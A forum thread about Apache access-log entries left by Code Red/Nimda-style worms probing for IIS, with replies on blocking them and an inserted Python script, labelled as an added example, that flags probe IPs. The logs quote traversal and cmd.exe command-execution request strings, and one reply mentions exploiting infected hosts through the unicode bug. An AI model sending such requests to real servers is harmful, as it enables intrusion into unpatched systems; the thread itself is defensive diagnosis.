
Thread: apache access.log

  1. #1

    Question apache access.log

    So... ah... from the strings I see here from my access log... I'm guessing this was either some skiddie trying to get in or... maybe a virus trying to spread itself... is that an accurate assumption or...?


    66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:25 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:29 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"



    And is there a way for me to make Apache just deny any requests from this other machine? I've found quite a few more, and I think another host is actually doing this same routine as we speak.
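    The log lines above are in Apache's common/combined format, and the request paths are the classic IIS probe set: direct hits on `root.exe` / `cmd.exe` plus directory traversal hidden behind double percent-encoding (`%255c` is `%5c` is `\`) and overlong UTF-8 (`%c0%af`, `%c1%1c`). The script below is an added example, not code from the thread: it parses lines of that shape, decodes the request path twice so the hidden traversal becomes visible, tags each entry, and counts probe hits per source IP so you can pick out the hosts worth blocking. The sample input reuses several lines from the post plus two constructed lines (a benign request and a second source IP with a single hit); the threshold of five hits is an arbitrary choice for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache common/combined log format (the fields the thread's lines contain).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Filenames the Code Red / Nimda-style probes ask for.
WORM_MARKERS = ("cmd.exe", "root.exe")

# Constructed sample: six lines copied from the post, one benign request and
# one single probe from a second (documentation-range) address.
SAMPLE_LOG = [
    '66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"',
    '66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"',
    '66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"',
    '66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"',
    '66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"',
    '66.128.109.148 - - [27/Nov/2002:23:20:29 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"',
    '198.51.100.7 - - [27/Nov/2002:23:21:00 -0600] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [27/Nov/2002:23:21:05 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"',
]


def parse_line(line):
    """Split one access-log line into its fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def decode_target(target):
    """Strip the query string and percent-decode twice.

    Decoding twice turns %255c into %5c and then into a backslash, which is
    exactly the double-encoding the IIS probes rely on. Overlong UTF-8 bytes
    such as %c0 or %c1 are not valid UTF-8, so they decode to U+FFFD, which
    we later use as a tell-tale of that trick.
    """
    path = target.split("?", 1)[0]
    return unquote(unquote(path, errors="replace"), errors="replace")


def classify(entry):
    """Return the set of probe indicators seen in one parsed entry."""
    decoded = decode_target(entry["target"]).lower()
    tags = set()
    for marker in WORM_MARKERS:
        if marker in decoded:
            tags.add(marker)
    if "../" in decoded or "..\\" in decoded:
        tags.add("traversal")
    if "\ufffd" in decoded:
        tags.add("overlong-utf8")
    return tags


def probe_counts(lines):
    """Count, per source IP, the requests that ask for cmd.exe or root.exe."""
    counts = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        if classify(entry) & set(WORM_MARKERS):
            counts[entry["ip"]] += 1
    return counts


def block_candidates(lines, threshold=5):
    """Source IPs with at least `threshold` probe hits, sorted for output."""
    return sorted(ip for ip, n in probe_counts(lines).items() if n >= threshold)


if __name__ == "__main__":
    for ip, n in probe_counts(SAMPLE_LOG).most_common():
        print(f"{ip}\t{n} probe(s)")
    print("candidates:", block_candidates(SAMPLE_LOG))
```

    Run it over a real `access.log` by replacing `SAMPLE_LOG` with the file's lines. The returned IP list is what you would feed into an Apache 2.4 `<RequireAll>` block with `Require not ip` entries if you decide to block at the web server; note that on Apache these probes already fail with 404 (or 400 for the malformed `%%35` variant), so the block is about cutting noise rather than closing a hole.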

  2. #2
    Looks VERY much like Nimda/Code red

  3. #3
    Yeah, it's like... I figured it couldn't be a real human hack attempt because of the rate of the URL requests or whatever... there's like two per second sometimes.
    Analog = Classical
    Digital = Techno

  4. #4
    That's probably one of the Internet worms looking for an unpatched IIS server (commonly Code Red). If you use UNIX, you don't have to worry about these log entries as they don't affect Apache; if you use Windows, make sure you are fully patched.

    I have the following lines at the end of my .htaccess file:
    Code:
    redirect /scripts http://www.whatever.invalid/
    redirect /MSADC http://www.whatever.invalid/
    redirect /c http://www.whatever.invalid/
    redirect /d http://www.whatever.invalid/
    redirect /_mem_bin http://whatever.invalid/
    redirect /msadc http://whatever.invalid/
    RedirectMatch (.*)cmd\.exe$ http://whatever.invalid/$1

  5. #5
    Just for fun, grep | wc -l your access_log and error_log for "cmd.exe" and see how many log entries there are for such IIS hack attempts: it's mind boggling!

    On a low-traffic Apache server at work, I get 2712 hits for cmd.exe (log starts June 14)!!

    Ammo
    Credit travels up, blame travels down -- The Boss

  6. #6
    I'm running it on an XP machine... it's just going to be up for a while to test a website so this client can look at it but... man... I am really surprised how often this is going... it's crazy to see how many times my machine gets hit with that... I thought Code Red and the like were all but gone! Guess not!

    Analog = Classical
    Digital = Techno

  7. #7
    the_JinX
    Probably someone infected with, as stated before, the Code Red or Nimda virus..

    the funny thing is, you can use this against them..
    When I was a mere scriptkiddie, I would search my logs for these and the fact is, if they have this worm, they can also be exploited via the unicode bug

    Not that any of us would ever do so.. so you can mail the man/woman behind the IP and tell them they've got a serious problem..


    Linux: don't be part of the problem, be part of the solution..
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !
